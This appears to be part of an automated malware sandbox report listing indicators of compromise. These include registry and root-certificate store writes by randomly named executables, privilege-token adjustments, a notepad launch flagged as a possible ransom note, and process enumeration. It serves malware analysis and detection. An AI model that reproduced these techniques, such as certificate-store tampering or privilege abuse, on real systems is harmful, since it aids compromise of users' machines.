\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 0O4uZyUrqIFSEpTeH1H0rg8K.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" oHE5OfAE7uZo5wM5zxGSo2Yh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings firefox.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e CkelNmqDwew6WPNzMTNOQeqx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e CkelNmqDwew6WPNzMTNOQeqx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e CkelNmqDwew6WPNzMTNOQeqx.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 CkelNmqDwew6WPNzMTNOQeqx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e CkelNmqDwew6WPNzMTNOQeqx.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\dnSpy-net-win64.zip:Zone.Identifier firefox.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 16572 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1852 PING.EXE 20644 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 10796 powershell.exe 10796 powershell.exe 22124 taskmgr.exe 10796 powershell.exe 22124 taskmgr.exe 5968 syncUpd.exe 5968 syncUpd.exe 10796 powershell.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 22124 taskmgr.exe 22124 taskmgr.exe 19904 powershell.exe 19904 powershell.exe 19904 powershell.exe 22124 taskmgr.exe 19904 powershell.exe 22124 taskmgr.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 22124 taskmgr.exe 6152 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 22124 taskmgr.exe 21000 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 4044 file.exe Token: SeDebugPrivilege 17004 taskmgr.exe Token: SeSystemProfilePrivilege 17004 taskmgr.exe Token: SeCreateGlobalPrivilege 17004 taskmgr.exe Token: SeDebugPrivilege 22124 taskmgr.exe Token: SeSystemProfilePrivilege 22124 taskmgr.exe Token: SeCreateGlobalPrivilege 22124 taskmgr.exe Token: 33 17004 taskmgr.exe Token: SeIncBasePriorityPrivilege 17004 taskmgr.exe Token: SeDebugPrivilege 17632 jsc.exe Token: SeDebugPrivilege 10796 powershell.exe Token: SeDebugPrivilege 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe Token: SeImpersonatePrivilege 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe Token: SeDebugPrivilege 19904 powershell.exe Token: SeDebugPrivilege 6152 powershell.exe Token: SeDebugPrivilege 17488 powershell.exe Token: SeDebugPrivilege 21576 powershell.exe Token: SeDebugPrivilege 12156 powershell.exe Token: SeDebugPrivilege 10676 powershell.exe Token: SeSystemEnvironmentPrivilege 20712 csrss.exe Token: SeSecurityPrivilege 9824 sc.exe Token: SeSecurityPrivilege 9824 sc.exe Token: SeDebugPrivilege 20248 HIIEBAFCBK.exe Token: SeBackupPrivilege 6264 svchost.exe Token: SeRestorePrivilege 6264 svchost.exe Token: SeSecurityPrivilege 6264 svchost.exe Token: SeTakeOwnershipPrivilege 6264 svchost.exe Token: 35 6264 svchost.exe Token: SeDebugPrivilege 20592 HIIEBAFCBK.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 6284 powershell.exe Token: SeDebugPrivilege 8112 powershell.exe Token: SeDebugPrivilege 9812 powershell.exe Token: SeDebugPrivilege 10020 uU0jFy7gS9hEAPMIe43bhoBX.exe Token: SeImpersonatePrivilege 10020 uU0jFy7gS9hEAPMIe43bhoBX.exe Token: SeDebugPrivilege 7828 powershell.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 4160 0O4uZyUrqIFSEpTeH1H0rg8K.exe Token: SeImpersonatePrivilege 4160 0O4uZyUrqIFSEpTeH1H0rg8K.exe Token: SeDebugPrivilege 5240 powershell.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 5148 powershell.exe Token: SeDebugPrivilege 9424 powershell.exe Token: SeDebugPrivilege 22132 firefox.exe Token: SeDebugPrivilege 22132 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
